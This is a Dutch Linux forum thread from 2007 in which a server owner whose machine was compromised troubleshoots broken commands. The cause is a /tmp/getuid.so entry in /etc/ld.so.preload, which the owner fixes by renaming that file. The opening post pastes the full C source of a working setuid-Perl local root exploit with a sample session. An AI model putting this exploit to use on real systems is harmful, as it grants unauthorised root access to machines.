[Linux] Gehacked getui.so probleem - Linux en overige clients

dinsdag 10 april 2007 11:24

Acties:

HEY! Dat ben ik!

Topicstarter

Hoi,

Ik ben gehacked via een perl exploit. Dit wist ik en was bezig spullen te verhuizen. Nu krijg ik sinds gisteren deze melding .

code:

1	ls: error while loading shared libraries: /tmp/getuid.so: cannot open shared object file: No such file or directory

bijvoorbeeld deze commando's
ls
vi
etc..

Is dit op te lossen zodat ik toch nog de verhuizing kan afmaken ?

Ik vermoed dat het hierdoor komt...

*
* Copyright Kevin Finisterre
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05
*
* this exploits a vulnerability in the PERLIO_DEBUG functionality
* tested against sperl5.8.4 on Debian
*
* kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
* kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
* ls: /etc/ld.so.preload: No such file or directory
* kfinisterre@jdam:~$ ./ex_perl
* sperl needs fd script
* You should not call sperl directly; do you need to change a #! line
* from sperl to perl?
* kfinisterre@jdam:~$ su -
* jdam:~# id
* uid=0(root) gid=0(root) groups=0(root)
* jdam:~# rm /etc/ld.so.preload
*
*/

#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <strings.h>

int main(int *argc, char **argv)
{

FILE *getuid;
if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
printf("error opening file\n");
exit(1);
}

fprintf(getuid, "int getuid(){return 0;}\n" );
fclose(getuid);

system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");

putenv("PERLIO_DEBUG="PRELOAD);
umask(001); // I'm rw-rw-rw james bitch!
system("/usr/bin/sperl5.8.4");
FILE *ld_so_preload;

char preload[] = {
"/tmp/getuid.so\n"
};

if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
printf("error opening file\n");
exit(1);
}
fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
fclose(ld_so_preload);
}

En toevallig vind ik dus van niet! :-)

dinsdag 10 april 2007 11:25

Acties:

TrailBlazer

Karnemelk FTW

is hetniet handiger een linux live cd te booten en op die manier je files veilig te stellen.

dinsdag 10 april 2007 11:28

Acties:

GX

Nee.

Inderdaad, je file is gewoon stuk en dan moet je er geen gebruik meer van maken; duw er een liveCD in, mount je drives en gebruik dat om backups te maken..

dinsdag 10 april 2007 11:34

Acties:

Multispeed

HEY! Dat ben ik!

Topicstarter

ja het punt is het is een colo dus het is niet "ff" erheen rijden vandaar dat ik het vanaf afstand wil doen.

Van mij part die getui.so terug zetten ofzo zodat het iig even werkt maar de hacker had waarschijnlijk root access kan ik het niet terug halen uit trash of lost+found ofzo ?

[ Voor 45% gewijzigd door Multispeed op 10-04-2007 11:35 ]

En toevallig vind ik dus van niet! :-)

dinsdag 10 april 2007 11:39

Acties:

kenneth

achter de duinen

lost+found is geen prullenbak zoals je die in GUI's ziet. Bestand weg = weg, tenzij je met 'n undelete-achtig programma nog iets kan terugtoveren. LiveCD is idd beste optie, ook al is het 'n stukje rijden.

Look, runners deal in discomfort. After you get past a certain point, that’s all there really is. There is no finesse here.

dinsdag 10 april 2007 11:41

Acties:

Multispeed

HEY! Dat ben ik!

Topicstarter

Weinig keus dan idd

kenneth schreef op dinsdag 10 april 2007 @ 11:39:
lost+found is geen prullenbak zoals je die in GUI's ziet. Bestand weg = weg, tenzij je met 'n undelete-achtig programma nog iets kan terugtoveren. LiveCD is idd beste optie, ook al is het 'n stukje rijden.

En toevallig vind ik dus van niet! :-)

dinsdag 10 april 2007 11:46

Acties:

blaataaps

Je kunt beter het shell-script in code-tags zetten, zo is het niet leesbaar.
En je getuid.so helemaal niet preloaden, als je geroot bent en dingen in /tmp preloaden is niet zo handig, probeer uit te vinden waar die preload nog vandaan komt (bijvoorbeeld die /etc/ld.so.preload) en haal hem daar weg, of zet een ongevaarlijke .so in tmp.

dinsdag 10 april 2007 12:53

Acties:

Multispeed

HEY! Dat ben ik!

Topicstarter

heb de ld.so.preload gerenamed

Dat heeft het opgelost ga nu snel verder alles over te zetten naar een veilige bak

Tnx!

En toevallig vind ik dus van niet! :-)